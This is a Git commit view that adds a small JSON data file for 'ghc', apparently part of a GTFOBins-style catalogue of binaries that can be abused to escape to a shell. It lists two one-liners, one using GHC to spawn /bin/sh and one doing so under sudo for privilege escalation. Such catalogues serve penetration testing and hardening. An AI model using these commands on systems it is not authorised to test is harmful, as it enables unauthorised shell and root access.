add data source for ghc

master
Mr. Robot 4 years ago committed by GitHub
parent f579f38819
commit 780e332421
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,14 @@
{
"functions": {
"shell": [
{
"code": "ghc -e 'System.Process.callCommand \"/bin/sh\"'"
}
],
"sudo": [
{
"code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'"
}
]
}
}
Loading…
Cancel
Save